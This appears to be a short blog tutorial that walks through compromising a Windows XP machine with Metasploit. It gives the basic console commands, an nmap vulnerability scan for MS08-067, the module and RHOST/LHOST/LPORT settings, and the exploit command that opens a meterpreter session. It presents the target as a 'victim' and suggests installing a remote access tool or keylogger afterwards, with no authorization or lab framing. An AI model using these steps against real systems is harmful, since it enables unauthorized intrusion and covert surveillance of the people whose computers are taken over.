Compromising A Windows User with Metasploit
Basic
Commands in METASPLOIT
1-Search:
MetaSploit
has a built in search feature which is used to search for a specific Exploit ,
Payload ,
Auxiliary
module lets suppose we are searching for “filezilla” it’s an exploit related to
ftp client name.
You will use
following commands :
1-Type
msfconsole on terminal in Kali Linux
2-After
msf> command appear type search <exploit>
2-Use:
The “use” command would load a
particular auxiliary/exploit module. Following is the snap shot which explain
it all.
3-Info:
This command is basically used to to load basic information about Exploit, Payload etc.
Following is
the snap shot which will revel all the information.
3-Show
Option:
This command
will show the attacker to set RHOST, LHOST etc.
RHOST:
Remote Host , its basically Remote IP.
LHOST: Local
Host , Its basically Local Ip
Compromising
A Windows Based Host
Now we will
use above commands and with some additional commands to compromise a windows
based host. We will use Windows xp for this purpose you can Search exploit for
windows 7 , 8 etc.
Latest
windows 7 & 8 are vulnerable to PDF attack where attacker uses to send a
specially crafted PDF file to his victim and there He is able to compromise
victim PC.
So now let’s
start…
1-use
following command to search for particular vulnerability in Windows based
operating system.
nmap <targetiP> --script=smb-check-vulns
Following are the result of this
command
The output
explains it all. It basically reveled that OS is vulnerable to MS08-067
vulnerability
So you can
also use other tools to find vulnerabilities but I prefer this tool because its
fast and reliable.
2- Now we
will use the following command to search for exploits related to this
vulnerability.
Search ms08_067_netapi
It will
search for the exploit, Remember that metasploit have huge database related to
exploits and payload. This command will show the following results:
4- Now we
will use this exploit simply typing “ use <exploit – path >” and it will
be automatically loaded , Following will
be the output of this command.
Now
afterward you have to follow these steps:
a) Type
“show options” command in terminal
b) Set RHOST <Target IP>
c) Set LHOST <You IP>
d) SET LPORT <Your open port>
5-Now it’s
the last step, you have to just type exploit command to launch this attack, and
your meterpreter session would be ON and you can run different commands on your
victim Operating System and you can even install your on software on victim pc
such as RAT (Remote Access tool) or Key Logger.
if you need any other help then follow me on twitter
if you need any other help then follow me on twitter
Happy
Hacking